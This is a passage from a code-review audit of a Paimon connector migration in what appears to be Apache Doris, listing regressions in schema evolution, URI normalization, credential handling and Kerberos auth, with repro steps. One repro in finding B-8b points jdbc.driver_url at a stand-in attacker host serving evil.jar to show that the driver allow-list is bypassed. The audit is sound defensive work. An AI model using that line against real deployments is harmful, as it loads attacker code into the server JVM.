`FileQueryScanNode.java:568` | `paimon/source/PaimonScanNode.java:443` (2-arg normalizing `LocationPath.of`) | Legacy builds the native RawFile path via the 2-arg normalizing factory so the split path is already `s3://`. Connector path: `file.path()` (raw oss://) → single-arg `LocationPath.of` sets `normalizedLocation=location` verbatim → `:568` emits raw oss://. Same scheme-mismatch failure at BE's S3 file factory. Sibling of B-7DV; on its own breaks native reads of OSS/COS-backed tables, DV-bearing or not. | Same OSS/COS table, parquet/orc data → native split asked to open `oss://bkt/...parquet` → BE `S3URI::parse` returns `InvalidArgument` | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| B-9 | BLOCKER | Static S3/OSS/COS/OBS credentials reach BE as RAW keys (`s3.access_key`, not `AWS_ACCESS_KEY`) — native reader on a private bucket gets no usable credentials | `PaimonScanPlanProvider.java:347-356` (copies raw keys verbatim under `location.`) | `paimon/source/PaimonScanNode.java:176,650-652`; `AbstractS3CompatibleProperties.java:105-122`; BE `s3_util.cpp:146-150` | Legacy normalizes any raw alias (`s3.access_key`/`oss.access_key`/…) into canonical `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/`AWS_ENDPOINT`/`AWS_REGION`/`AWS_TOKEN`. Connector copies raw catalog keys verbatim under `location.*`; `PluginDrivenScanNode.getLocationProperties:307-317` only strips the prefix. BE native ORC/Parquet (FILE_S3) parses only `AWS_*` → no credentials → 403. JNI path unaffected (serialized Table carries its own FileIO). Bare `AWS_*`/`access_key` (no `s3.` prefix) is dropped entirely. Codified by connector's own `PaimonScanPlanProviderTest.java:535`. | `CREATE CATALOG ... s3.access_key/s3.secret_key/s3.endpoint`; `SELECT *` over raw parquet/orc → BE gets `location.s3.access_key` (unrecognized) → AccessDenied | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| B-8a | BLOCKER | JDBC flavor sends BE raw unresolved `jdbc.driver_url` and drops the `paimon.jdbc` alias | `PaimonScanPlanProvider.java:549-565` (forwards all `jdbc.*` keys verbatim) | `PaimonJdbcMetaStoreProperties.java:164-176`; `PaimonScanNode.java:507-520` | Legacy emits only `jdbc.driver_url=getFullDriverUrl(resolved)` + `jdbc.driver_class`. Connector forwards `jdbc.*` verbatim so `driver_url` is unresolved; the `paimon.jdbc.driver_url` alias (`PaimonConnectorProperties.java:73`) fails the `key.startsWith("jdbc.")` filter and is dropped. BE `JdbcDriverUtils.java:42 new URL(value)`; bare jar → `MalformedURLException`. | `CREATE CATALOG paimon jdbc, jdbc.driver_url=mysql.jar`; `SELECT` → `MalformedURLException` | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| B-8b | BLOCKER | JDBC `driver_url` security allow-list and format validation not enforced | `PaimonConnector.java:232-247,206-216,249-287` (`resolveFullDriverUrl` does no validation) | `JdbcResource.java:300-329`; `PaimonJdbcMetaStoreProperties.java:190` | Legacy `getFullDriverUrl` rejects bad formats, runs `checkCloudWhiteList` vs `jdbc_driver_url_white_list`, enforces `jdbc_driver_secure_path`. Connector accepts any scheme/path, loads the jar in the FE JVM at create. The in-code "paimon is not in SPI_READY_TYPES" disclaimer (`PaimonConnector.java:230`) is **stale/false** post-B7 (`CatalogFactory.java:51` now includes paimon). The correct hook `ConnectorValidationContext.validateAndResolveDriverPath` is wired (jdbc/trino override `preCreateValidation`) but paimon does not override it. | FE with non-default `jdbc_driver_secure_path`; `CREATE CATALOG paimon jdbc, jdbc.driver_url=http://attacker/evil.jar` → connector loads it into FE JVM | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | + +> **Note on schema-evolution BLOCKER duplication:** paths #1, #10 (params-level), #13, and the +> critic each independently confirmed the *same* native schema-evolution loss against the same +> connector lines (`PaimonScanRange.java:181-184`) and the same BE branch +> (`table_schema_change_helper.h`). They are one defect (B-1a / B2 family), each 3/3 confirmed. +> Likewise the URI-normalization BLOCKERs (B-7DV, B-7DF) are two instances of the one +> normalization root cause and were re-confirmed by the critic's `additional_finding`. + +### CONFIRMED MAJORs + +| ID | Sev | Title | Connector file:line | Legacy file:line | Behavior diff | Repro | 3-lens verdict (upheld/3) | +| --- | --- | --- | --- | --- | --- | --- | --- | +| M-1 | MAJOR | `force_jni_scanner` session variable silently ignored on the connector scan path | `PaimonScanPlanProvider.java:261,439-441` (only `paimonHandle.isForceJni()`, the binlog/audit flag) | `paimon/source/PaimonScanNode.java:361,430` (`sessionVariable.isForceJniScanner()` gate) | Legacy routes ALL data splits to JNI when `SET force_jni_scanner=true`. Connector has no equivalent; native always chosen for ORC/Parquet. The var IS in the session-properties map (connector reads sibling `enable_paimon_cpp_reader` from it) but is never consulted. The escape hatch (used to dodge native-reader bugs, e.g. the schema-evolution BLOCKER) is gone. | `SET force_jni_scanner=true; SELECT * FROM paimon_orc_table` → connector still native | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| M-2 | MAJOR | COUNT(\*) pushdown (FE-computed `mergedRowCount`) not implemented | `PaimonScanPlanProvider.java:186-296` (no count branch; `paimon.row_count` never set) | `paimon/source/PaimonScanNode.java:396,421-429,483-495,303-308` | Count pushdown is still ENABLED for the node (`PhysicalPlanTranslator.java:873`), but connector never computes `mergedRowCount` nor emits `paimon.row_count`, so `table_level_row_count=-1`. BE falls back (`paimon_jni_reader.cpp:104`, `file_scanner.cpp:1298-1326`) and materializes merged rows to count. Results CORRECT; perf regression, esp. for PK tables (merges/deletes). | `SELECT count(*) FROM paimon_pk_table` → connector materializes all merged rows via JNI | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| M-3 | MAJOR | Native ORC/Parquet sub-file splitting (parallelism) lost | `PaimonScanPlanProvider.java:263-286` (one range per RawFile; no split-size logic) | `paimon/source/PaimonScanNode.java:434-465,499-500` (`determineTargetFileSplitSize` + `fileSplitter.splitFile`) | Legacy splits each native raw file into many sub-range splits for intra-file parallelism. Connector emits exactly one split per file; `PluginDrivenSplit` is a pure 1:1 wrapper, no re-split, no `setTargetSplitSize`. Large ORC/Parquet files → one scanner instead of many. Correctness unchanged. | `SELECT *` over multi-GB native files → fewer parallel scan instances | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| M-8 | MAJOR | filesystem/jdbc over Kerberized HDFS lose UGI `doAs` (HDFS authenticator never wired) | `PaimonConnector.java:124-196`; `PluginDrivenExternalCatalog.java:122-137,150` | `PaimonFileSystemMetaStoreProperties.java:40-57`; `PaimonJdbcMetaStoreProperties.java:111-135` | Legacy sets the HDFS Kerberos authenticator in `initializeCatalog` and wraps ops in `doAs`. Connector never calls `initializeCatalog` (only the bypassed legacy `createCatalog` does); runtime authenticator stays the base no-op (`AbstractPaimonProperties.java:45`). HMS works because it sets the authenticator in `initNormalizeAndCheckProps` (always runs). filesystem/jdbc have no such override → no `doAs`. | `CREATE CATALOG paimon filesystem` on Kerberized HDFS → reads run outside `doAs`, fail KDC auth | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| M-10 | MAJOR | Read schema loses paimon field-id (`Column.uniqueId`) for every column incl. nested complex types | `PaimonConnectorMetadata.java:1007-1012` (5-arg `ConnectorColumn`, no field-id); `ConnectorColumnConverter.java:65-70` (7-arg `Column` ctor → `uniqueId=-1`) | `PaimonExternalTable.java:349-355` (`updatePaimonColumnUniqueId`); `PaimonUtil.java:318-347` (recurses into ARRAY/MAP/ROW) | Legacy sets `column.setUniqueId(paimonField.id())` on every column and recursively on nested children. SPI `ConnectorColumn` has no field-id channel; `convertColumn` never sets `uniqueId`, so all Doris columns carry `uniqueId=-1`. Root cause that also disables the field-id BE contract (BLOCKER B2 family). | `DESCRIBE` paimon table: legacy field ids vs connector all `-1` | C=upheld, P=upheld, **R=refuted** (2/3, **confirmed** by majority; see §4) | +| M-11 | MAJOR | MTMV / SHOW PARTITIONS / partitions-TVF partition listing loses the Kerberos authenticator (UGI `doAs`) | `PaimonCatalogOps.java:249-251` (bare `catalog.listPartitions`); `PaimonConnectorMetadata.java:892-894` (unwrapped); `PluginDrivenMvccExternalTable.java:157`; `PluginDrivenExternalTable.java:317-318` | `PaimonExternalCatalog.java:96-118` (`getPaimonPartitions` wraps in `executionAuthenticator.execute`); `PaimonPartitionInfoLoader.java:49` | Legacy ran remote `listPartitions` inside a per-CALL Kerberos UGI `doAs`. Connector issues the same RPC with NO `executeAuthenticated` wrap (deliberate D7=B read-vs-DDL asymmetry; DDL ops ARE wrapped). On a Kerberos HMS catalog the RPC runs without the catalog principal → GSS failure or wrong-principal read. (Claim's "DLF" clause overstated — DLF inherits the no-op authenticator; concrete loss is HMS-Kerberos.) Gated to secured deployments. | Kerberos HMS catalog: `CREATE MV ... FROM partitioned_tbl`, `SHOW PARTITIONS`, or `partitions(...)` TVF → listPartitions RPC runs without `doAs` | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| M-crit | MAJOR | Read-schema type-mapping flags silently disabled: connector reads underscore keys but FE/legacy set DOTTED keys → BINARY / TIMESTAMP_TZ map to the WRONG Doris type for users who enabled them | `PaimonConnectorProperties.java:39,42` (`enable_mapping_binary_as_varbinary` / `enable_mapping_timestamp_tz`); read `PaimonConnectorMetadata.java:1017-1027`; consumed `PaimonTypeMapping.java:130-165` | `CatalogProperty.java:50,52` (`enable.mapping.varbinary` / `enable.mapping.timestamp_tz`); `ExternalCatalog.setDefaultPropsIfMissing:302-306`; `PaimonUtil.paimonPrimitiveTypeToDorisType:253,257,283-286` | `createConnectorFromProperties` passes raw catalog props (DOTTED keys) to the connector, which looks up the UNDERSCORE keys → absent → both flags default false unconditionally. Legacy mapped BINARY→VARBINARY and TIMESTAMP_WITH_LOCAL_TIME_ZONE→TIMESTAMPTZ when enabled; connector always maps BINARY→STRING and LTZ→DATETIMEV2. The varbinary key is also semantically renamed, so even hand-correcting dots→underscores would still miss it. | `CREATE CATALOG ... 'enable.mapping.timestamp_tz'='true'`; `DESC`/`SHOW CREATE TABLE` → legacy TIMESTAMPTZ, connector DATETIMEV2 | Critic-surfaced; evidence-anchored end-to-end (not run through 3-lens gate) | + +--- + +## 4. Findings RAISED but REFUTED by adversarial verification + +Only one verdict-bearing finding was refuted on a lens (the finding overall is still +confirmed at MAJOR by the other two lenses — only the *standalone repro* was refuted): + +- **M-10 reproducibility lens — REFUTED (the standalone `Column.getUniqueId()` repro).** + The factual core is real (cutover paimon columns carry `uniqueId=-1`; legacy set it via + `updatePaimonColumnUniqueId`). But the *asserted observable* — + `ExternalUtil.getExternalSchema(root.setId(column.getUniqueId()))` — is **not reachable at + HEAD** for a cutover paimon table for three independent reasons: + 1. **Dead path for cutover.** The only paimon caller of `ExternalUtil.initSchemaInfo` is the + legacy `PaimonScanNode:169`. A cutover paimon table routes via + `PhysicalPlanTranslator.java:737` to `PluginDrivenScanNode`, which returns `FORMAT_JNI`, + never calls `initSchemaInfo`, and never references `getUniqueId` (grep: zero hits). + 2. **`getUniqueId()` was never the BE field-id channel even in legacy.** Line 169 passes + `schemaId=-1` with a TODO; the per-schema field-id the BE native reader actually consumes + flows through `PaimonScanNode.putHistorySchemaInfo` → `PaimonUtil.getSchemaInfo` → + `childField.setId(paimonField.id())` (`PaimonUtil.java:415`), read straight from the + paimon `DataField`, **not** from `Column.getUniqueId()`. So the claim mislocates the + channel. + 3. **No live FE consumer surfaces it.** DESCRIBE/SHOW COLUMNS render + name/type/comment/nullable, not `uniqueId`; the only external-table consumer of + `getUniqueId()` is the dead `ExternalUtil` path. + + The genuine BE field-id concern belongs to the separately-confirmed BLOCKER (B2 family, + connector scan-side `history_schema_info`), a different code path. As a STANDALONE MAJOR with + the asserted `Column.getUniqueId()`/`ExternalUtil` repro, this claim's repro does not trigger + at HEAD — refuted on the reproducibility lens. The new-code-correctness and legacy-parity + lenses upheld it (the field-id IS lost FE-side), so M-10 remains **confirmed MAJOR** by + majority, with the caveat that its observable impact rides entirely on the B2 BLOCKER, not on + a distinct user-visible `uniqueId` symptom. + +No findings were upgraded; no BLOCKER/MAJOR severities were invented for refuted items. + +--- + +## 5. MINOR / NIT Findings (compact) + +Path #1 (basic read): +- **MINOR** `ignore_split_type` session variable ignored (`PaimonScanPlanProvider.java`; legacy `PaimonScanNode.java:368-369,389-391,431-433,471-473`). Diagnostic-only. +- **MINOR** Partition null-sentinel handling differs (`\N` / `__HIVE_DEFAULT_PARTITION__` coerced to NULL) (`PaimonScanRange.java:221-225` → `ConnectorPartitionValues.java:46-53`; legacy `PaimonScanNode.java:323-326`). Extreme edge case. +- **MINOR** CAST-bearing predicates no longer pushed to Paimon — **intentional, safer than legacy** (`PaimonConnectorMetadata.java:810-813`; legacy `PaimonPredicateConverter.java:178-200`). Reduced source-side pruning only; prevents a latent legacy over-pruning data-loss bug. + +Path #2 (@incr): +- **NIT** Sys-table + @incr rejection message text changed "Paimon" → "Plugin" (`PluginDrivenScanNode.java:511`; legacy `PaimonScanNode.java:885`). +- **MINOR** BE-serialized table for @incr is the incremental-window-copied table vs legacy latest-snapshot-pinned — verified inert on the BE read path (`PaimonScanPlanProvider.java:306-316`; legacy `PaimonScanNode.java:167`). + +Path #3 (time travel): +- **MINOR** TIMESTAMP not-found error message text differs (loses earliest-snapshot hint), same condition (`PluginDrivenMvccExternalTable.java:328-333`; legacy `PaimonUtil.java:665-676`). +- **NIT** INCREMENTAL @incr drops legacy's `scan.snapshot-id=null` / `scan.mode=null` defensive resets — no-op on a fresh base Table (`PaimonIncrementalScanParams.java:222-267`; legacy `PaimonScanNode.java:841-846`). + +Path #4 (branch/tag): +- **MINOR** Branch schema resolved against the BRANCH's `schemaManager` vs the BASE table's (`PaimonConnectorMetadata.java:188-197`; legacy `PaimonExternalTable.java:342-343`). Connector arguably more correct. +- **MINOR** Branch `schemaId` from latest-snapshot.schemaId() vs `schemaManager.latest().id()` (`PaimonConnectorMetadata.java:485-489`; legacy `PaimonExternalTable.java:167-170`). Diverges only on ALTER-without-snapshot. +- **NIT** Branch/sys/timestamp not-found error-message text divergences, same conditions (`PluginDrivenMvccExternalTable.java:319-336`; legacy `PaimonUtil.java:701-707`). + +Path #5 (sys-tables): +- **MINOR** `getSupportedSysTables()` now requires a remote table-handle resolution; legacy returned a static list. Transient remote failure suppresses the sys-table catalog (`PluginDrivenExternalTable.java:391-416`; legacy `PaimonExternalTable.java:392-396`). + +Path #6 (metadata cache): +- **MINOR** Legacy live-Table handle cache dropped — every metadata/scan access re-fetches the Table; `paimon.table.cache.*` sizing props now inert (`PaimonConnectorMetadata.java:131`; legacy `PaimonExternalMetaCache.java:70-72,98-102`). Perf only. +- **MINOR** Schema cache keyed by name only (not `schemaId`) — historical time-travel schema recomputed per query (`PluginDrivenMvccExternalTable.java:254-257,347-357`; legacy `PaimonSchemaCacheKey.java:25-55`). Correctness preserved; perf only. + +Path #7 (deletion vectors): +- **MINOR** `getDeleteFiles()` not overridden for plugin-driven scans → VERBOSE EXPLAIN omits deletion-file accounting (`PluginDrivenScanNode.java` inherits `FileScanNode.java:123` default; legacy `PaimonScanNode.java:337-357`). Display-only. + +Path #9 (storage systems): +- **MINOR** HDFS static config drops legacy-derived defaults (`ipc.client.fallback-to-simple-auth-allowed=true`, `hdfs.security.authentication`, hadoop config-resources file) (`PaimonScanPlanProvider.java:348-356`; legacy `HdfsProperties.java:163-189`). Same root cause as B-9. +- **MINOR** FE-only metastore keys (`hive.metastore.uris` and all `hive.*`, incl. keytab paths) pushed to BE as `location.*` (`PaimonScanPlanProvider.java:350-354`; legacy `PaimonScanNode.java:650-652` never sent them). Information-exposure/noise; BE ignores unknown keys. + +Path #10 (type mapping): +- **MINOR** WRITE direction drops nested struct-field comments (`PaimonTypeMapping.java:265-276`; root cause `ConnectorColumnConverter.java:100-108` — `ConnectorType.structOf` carries names only; legacy `DorisToPaimonTypeVisitor.java:51-63`). +- **MINOR** Read schema: every paimon column now `isKey=false` (legacy `initSchema` marked all `isKey=true`) (`PaimonConnectorMetadata.java:1007`; legacy `PaimonExternalTable.java:349-353`). DESCRIBE display only. +- **MINOR** Read schema loses `WITH_TIMEZONE` extraInfo tag for LTZ columns (`PaimonTypeMapping.java:157-166`, `PaimonConnectorMetadata.java:993-1014`; legacy `PaimonExternalTable.java:356-358`). DESCRIBE/SHOW display only. +- **NIT** Read VARCHAR length boundary off-by-one: VARCHAR(65533) → STRING (connector) vs VARCHAR(65533) (legacy); also `len<=0` → STRING (`PaimonTypeMapping.java:113-119`; legacy `PaimonUtil.java:239-244`). Reported type only; same data. + +Path #12 (MVCC): +- **MINOR** Branch time-travel `schemaId` from latest-snapshot's schema, not branch's latest schema (`PaimonConnectorMetadata.java:486-489`; legacy `PaimonExternalTable.java:168`). Diverges only on commit-without-data. +- **MINOR** FOR TIME AS OF not-found message loses the "earliest snapshot timestamp" detail (`PluginDrivenMvccExternalTable.java:328-333`; legacy `PaimonUtil.java:666-676`). Text-only. + +Path #13 (cross-cutting): +- **MINOR** Connector ignores `ignore_split_type` (`IGNORE_JNI`/`IGNORE_NATIVE`) (`PaimonScanPlanProvider.java:234-292`; legacy `PaimonScanNode.java:368-369,389,431,471`). Diagnostic-only. + +Critic additional findings (MINOR): +- **MINOR** Partition NULL value rendered `\N` (connector) vs `""` (legacy) in `columnsFromPath`; connector additionally coerces literal `__HIVE_DEFAULT_PARTITION__`/`\N` string partition values to NULL (`PaimonScanRange.java:212-225`, `ConnectorPartitionValues.java:32-54`; legacy `PaimonScanNode.java:323-326`). +- **MINOR** ALTER TABLE CREATE/REPLACE/DROP BRANCH/TAG on a cutover paimon table throws a different exception type/message (base `ExternalCatalog.java:1432-1501` `DdlException` vs legacy `PaimonMetadataOps.java:315-333` `UnsupportedOperationException`). Both reject; text/class only. + +--- + +## 6. Per-Path Parity Summaries (13 paths) + +**Path #1 — Basic read (normal scan): NOT at parity.** Core per-type partition rendering, +predicate literal conversion, JNI/native/cpp split-format selection, table-location, +self-split-weight, serialized-table, predicate push, and session-timezone source are all +byte-faithful and match. But the connector does not run old logic and in doing so DROPS +several legacy fe-core semantics: most seriously the entire schema-evolution mechanism +(BLOCKER B-1a), plus `force_jni_scanner`/`ignore_split_type` controls, storage-path scheme +normalization, FE-side COUNT(\*) pushdown, and FE-side sub-file splitting. One BLOCKER + four +MAJORs. + +**Path #2 — Batch incremental read (@incr): CLEAN.** `PaimonIncrementalScanParams.validate` +is a byte-faithful port of legacy `validateIncrementalReadParams` (only signature, cosmetic +wrapping, and three benign stripped null-resets differ). All three legacy guards reproduced; +the stripped null-resets are verified benign because the connector's base table is never +pre-pinned. No BLOCKER/MAJOR; two NIT/MINOR that do not change results. + +**Path #3 — Time Travel (FOR TIME/VERSION AS OF): CLEAN.** Cutover is real end-to-end; legacy +`PaimonExternalTable.getPaimonSnapshotCacheValue` is unreachable. All five spec kinds map +byte-faithfully; session-TZ datetime parse replicates `TimeUtils` byte-for-byte; +schema-at-snapshot resolves the historical schema + partition keys exactly. Only divergences +are documented, text-only/effect-noop. No BLOCKER/MAJOR. + +**Path #4 — Branch / Tag read: CLEAN (no data-loss/wrong-rows).** Cleanly cutover; TAG read is +byte-parity; BRANCH read is functionally correct and matches legacy at the data level. The +only real divergences are in branch SCHEMA-version resolution under independent branch schema +evolution (connector reads the branch's own `schemaManager`/snapshot schema — arguably MORE +correct than legacy) plus three text-only error-message divergences. No BLOCKER/MAJOR. + +**Path #5 — System tables: CLEAN.** Legacy sys path is DEAD for cutover catalogs and does not +fall back. The connector reimplementation is a near-exact parity port: +`listSupportedSysTables`, `getSysTableHandle` (same 4-arg identifier, same case-insensitive +check, same `forceJni={binlog,audit_log}` rule), the HIVE_TABLE descriptor, privilege unwrap, +and SHOW CREATE TABLE unwrap all match. Only divergence: `getSupportedSysTables()` now needs a +live remote handle resolution (MINOR). + +**Path #6 — Metadata cache: CLEAN (perf/architectural only).** The cutover intentionally swaps +the legacy 3-level paimon cache for the generic schema-only cache + per-query live metadata, +and does so correctly. No live control flow back into `datasource/paimon/*`; GSON compat +revives old catalogs/dbs/tables as PluginDriven variants. REFRESH TABLE/CATALOG/DB and ALTER +CATALOG SET PROPERTIES all reach correct invalidation; partition-name rendering and +`isPartitionInvalid` are byte-parity. Divergences are perf/architectural, not correctness — +no wrong-rows, no lost invalidation, no stale-cache hazard. + +**Path #7 — Deletion Vector read: NOT at parity (BLOCKER).** DV assembly STRUCTURE +(native-vs-JNI routing, per-i DV pairing, `selfSplitWeight` accounting, BE thrift wire format) +is faithful. But the connector drops the legacy URI normalization on BOTH the deletion-file +path AND the native data-file path — feeding BE unrecognized `oss://`/`cos://`/`obs://`/`s3a://` +schemes. Two BLOCKERs (B-7DV deletion-file, B-7DF data-file). Pure-`s3://`/`hdfs://` tables are +unaffected. One MINOR (EXPLAIN delete-file accounting). + +**Path #8 — Multi metadata-service (flavor assembly): NOT at parity.** Paimon is LIVE. Most +flavor logic matches and HMS Kerberos auth survives. But two BLOCKERs (JDBC raw/unresolved +`driver_url` + dropped alias → `MalformedURLException`; JDBC driver_url security validation +bypassed → arbitrary remote jar in FE JVM) and one MAJOR (filesystem/jdbc over Kerberized HDFS +lose UGI `doAs` because `initializeCatalog` is dead on the cutover path). The in-code +"not in SPI_READY_TYPES" disclaimer is stale. + +**Path #9 — Multi storage-system access: NOT at parity (BLOCKER).** Two sub-paths. (1) Vended +REST credentials: faithful — reuses the EXACT legacy normalization tail, byte-equivalent AWS_* +keys. CLEAN. (2) STATIC (non-vended) S3/OSS/COS/OBS credential downflow is BROKEN: connector +copies RAW catalog keys verbatim under `location.*` with no normalization, so BE's native +reader never sees recognized `AWS_*` credentials (BLOCKER B-9). Verified against the +connector's own test that codifies the raw key. Two MINORs (HDFS derived defaults dropped; +FE-only `hive.*` keys leaked to BE). + +**Path #10 — Column type mapping: NOT at parity.** WRITE direction (Doris→Paimon) is a +faithful port. READ direction is mostly faithful but drops three column-level legacy semantics +(`uniqueId`/field-id, all-columns `isKey=true`, `WITH_TIMEZONE` extraInfo). The field-id loss +is the serious one (MAJOR M-10, root cause of the BE schema-evolution BLOCKER). WRITE also +silently drops nested struct-field comments. The standalone `getUniqueId()` repro was refuted +(§4); the real impact rides on B2. + +**Path #11 — MTMV (materialized view): NOT at parity (MAJOR).** MTMV path is LIVE on the +connector; legacy `PaimonExternalTable` is dead baseline. Partition listing/name rendering, +`PartitionItem` build, `isPartitionInvalid`, MTMV snapshots, and the three consumers all map +1:1 to legacy. The one substantive divergence: legacy wrapped partition listing in the +Kerberos authenticator (UGI `doAs`); the connector read path does NOT (MAJOR M-11, scoped to +secured HMS deployments; the "DLF" clause is overstated). + +**Path #12 — MVCC (MvccSnapshot): CLEAN.** Faithfully migrated and LIVE. The three MVCC SPI +methods reproduce legacy `getPaimonSnapshotCacheValue` and PaimonUtil resolution exactly +(query-begin pins latest, explicit time-travel pins `scan.snapshot-id`/`scan.tag-name`, @incr +ports validation byte-for-byte, @branch loads the branch table via a 3-arg Identifier). The +scan-side pin is correct at all three handle-consumption sites; the pinned table is serialized +to BE identically to legacy. No fallback, no shadow class, no swallowing no-op, no +serialization mismatch. Two narrow, documented, benign MINOR/NIT divergences. + +**Path #13 — Cross-cutting fallback enumeration: see §8.** Cutover is active; legacy +`datasource/paimon/*` is dead-but-in-tree and NONE are reached on the connector path. Every +fe-core consumer that still imports/instanceof's legacy paimon is ordered or gated so the +PluginDriven branch wins and preserves legacy semantics. The serious divergences are NOT +fallbacks into old logic but LOST legacy semantics on the BE serialization contract (schema +evolution + `force_jni_scanner`/`ignore_split_type`). One BLOCKER + one MAJOR + one MINOR. + +--- + +## 7. Completeness Critic + +### Coverage gaps surfaced (warrant a follow-up pass) + +1. **DDL operations (CREATE/DROP TABLE, CREATE/DROP DATABASE) and ALTER TABLE + CREATE/DROP BRANCH/TAG.** None of the 13 paths traced `PaimonConnectorMetadata` + `createTable`/`dropTable`/`createDatabase`/`dropDatabase` + (`PaimonConnectorMetadata.java:683-797`) against legacy `PaimonMetadataOps` end-to-end. + Branch/tag READ was covered (path #4) but branch/tag DDL WRITE + (`ExternalCatalog.java:1427-1513`) was not. **Follow-up:** trace IF-NOT-EXISTS/IF-EXISTS + short-circuit, editlog/cache-refresh ordering, and error-code parity + (`ERR_DB_CREATE_EXISTS` vs `DorisConnectorException`) on stale FE cache. +2. **Read-direction type-mapping catalog flags** (`enable.mapping.varbinary` / + `enable.mapping.timestamp_tz`). Path #10 examined the mapping LOGIC but never checked the + PROPERTY-KEY wiring — which is broken (see additional_finding #1 / MAJOR M-crit). + **Follow-up:** add a UT asserting an LTZ column maps to TIMESTAMPTZ with + `{"enable.mapping.timestamp_tz":"true"}`; verify the connector reads the dotted keys (or + that the FE layer normalizes dots→underscores). +3. **Statistics / fetchRowCount / ANALYZE.** `fetchRowCount` independently confirmed a faithful + port (no finding), but `ExternalAnalysisTask` / column-statistics path not compared. + **Follow-up:** confirm `ANALYZE TABLE` and `getColumnStatistic` parity. +4. **HMS flavor hive-site.xml / hadoop conf resource loading.** Path #8 covered HMS Kerberos + auth survival but not `hive.config.resources` / hive-site.xml downflow into BE-facing scan + properties. **Follow-up:** trace whether `hive.config.resources` reaches + `getScanNodeProperties` for HMS/DLF as it did in legacy `getLocationProperties`. +5. **Native sub-file split parallelism + deletion-file pairing under splitting.** Path #1 + flagged the parallelism loss but did not analyze plan-shape impact on batch-mode scheduling + / `SqlBlockRuleMgr` split-count limits (a known prior regression area). + **Follow-up:** check split-count accounting is fed the per-RawFile count and that batch-mode + large-file scans still parallelize acceptably. + +### Additional findings surfaced by the critic + +- **MAJOR (M-crit, listed in §3):** Read-schema type-mapping flags silently disabled + (dotted-vs-underscore key mismatch) → wrong Doris column types for users who enabled + BINARY→VARBINARY or TIMESTAMP_TZ→TIMESTAMPTZ. **The most important thing the 13 paths + missed.** +- **BLOCKER (re-confirmation):** Native DV/data-file paths sent un-normalized, confirmed + end-to-end through the BE file factory (`paimon_reader.cpp` opens `delete_range.path` + verbatim; unrecognized scheme fails the MOR read). Corroborates B-7DV / B-7DF. +- **BLOCKER (re-confirmation):** Native schema-evolution loss confirmed through BE + (`table_schema_change_helper.h:219-236` falls back to `by_parquet_name`/`by_orc_name` when + `history_schema_info` is unset). Corroborates B-1a / B2. +- **MINOR:** Partition NULL render-string divergence (`\N` vs `""`) + literal-sentinel + coercion. +- **MINOR:** Branch/tag DDL rejected with a different exception type/message (both reject; + not a functional regression). + +### Critic overall assessment + +The 13-path digest is broadly accurate; the two BLOCKER families (native scheme-normalization +loss and native schema-evolution loss) are real and independently confirmed end-to-end +including the BE-side mechanism. The cutover dispatch is sound: every fe-core switch checked +(`BindRelation:543`, `Alter:620`, `ShowPartitionsCommand:263`, `Env` SHOW CREATE TABLE`:4929`, +`TableIf.toMysqlType:323`) has a `PLUGIN_EXTERNAL_TABLE` branch preserving legacy semantics; +the `instanceof PaimonExternalTable` sites (`Env:4910`, `PaimonSysTable:62`, `PaimonSource:73`) +are dead for cutover catalogs. The connector `PaimonPredicateConverter` and `fetchRowCount` are +faithful ports. The reviewers' biggest miss is the dotted-vs-underscore mapping-flag MAJOR. + +--- + +## 8. Cross-Cutting Fallback Enumeration (Path #13) + +**Are there places still running old logic / falling back / losing semantics?** + +**No live fallback into legacy code was found.** Cutover is active and the legacy +`datasource/paimon/*` set is dead-but-in-tree: + +- `CatalogFactory` routes `paimon` through the SPI (`SPI_READY_TYPES`, + `CatalogFactory.java:51,104-112`), so the catalog/db/table become `PluginDriven*`. +- The following legacy classes are **NONE reached** on the connector path: + `PaimonExternalCatalog` / `PaimonExternalDatabase` / `PaimonExternalTable`, + `PaimonExternalMetaCache`, `metacache/paimon/*` loaders, `source/PaimonScanNode`, + `source/PaimonPredicateConverter`, `systable/PaimonSysTable`, + `Paimon*MetaStoreProperties`, `PaimonVendedCredentialsProvider`, + `VendedCredentialsFactory.PAIMON`. +- Every fe-core consumer that still imports/instanceof's legacy paimon + (`ShowPartitionsCommand`, `Env` SHOW CREATE TABLE, `UserAuthentication`, + `ExternalMetaCacheRouteResolver`, `BindRelation`, `Alter`, `TableIf`, + `ExternalCatalog.getDb`, `SysTableResolver`) is either **ordered** so the `PluginDriven` + branch wins first, or **gated** on a `logType`/`getType()`/`instanceof` that the connector + objects never satisfy, with the connector branch preserving legacy semantics. +- No shadow/duplicate classes, no stubs/TODOs swallowing behavior, no no-op SPI hooks + swallowing a result. `PaimonExternalCatalogFactory` has zero callers; GSON compat at + `persist/gson/GsonUtils.java:403-411,463-464,488-489` revives every old paimon + catalog/db/table as the `PluginDriven*` variant. + +**Places that LOSE legacy semantics (not fallbacks — the connector re-implements without +the step, silently degrading the frozen BE contract):** + +1. **Native field-id schema-evolution** — the connector never emits + `history_schema_info` / `current_schema_id`, so the BE scanner degrades from FIELD-ID to + NAME-based file<->table column matching → wrong/NULL rows on column rename/reorder. + (BLOCKER B-1a / B2.) Legacy baseline: `paimon/source/PaimonScanNode.java` + + `ExternalUtil.initSchemaInfo` + `PaimonUtil.getHistorySchemaInfo`. +2. **Native URI scheme normalization** — data-file and deletion-file paths sent un-normalized + (oss/cos/obs/s3a not rewritten to s3), breaking native + DV reads on S3-compatible + warehouses. (BLOCKERs B-7DF / B-7DV.) Legacy baseline: 2-arg + `LocationPath.of(path, storagePropertiesMap)`. +3. **Static object-store credentials** delivered as RAW keys instead of canonical `AWS_*`. + (BLOCKER B-9.) Legacy baseline: + `CredentialUtils.getBackendPropertiesFromStorageMap(getBackendConfigProperties())`. +4. **JNI-vs-native reader session knobs** — `force_jni_scanner` (MAJOR M-1) and + `ignore_split_type` (MINOR) are dropped from the connector's reader-selection logic. +5. **Kerberos UGI `doAs`** — lost on filesystem/jdbc catalog ops (MAJOR M-8) and on MTMV / + SHOW PARTITIONS / partitions-TVF partition listing (MAJOR M-11) on secured HMS deployments. +6. **Type-mapping flags** — read via the wrong (underscore) 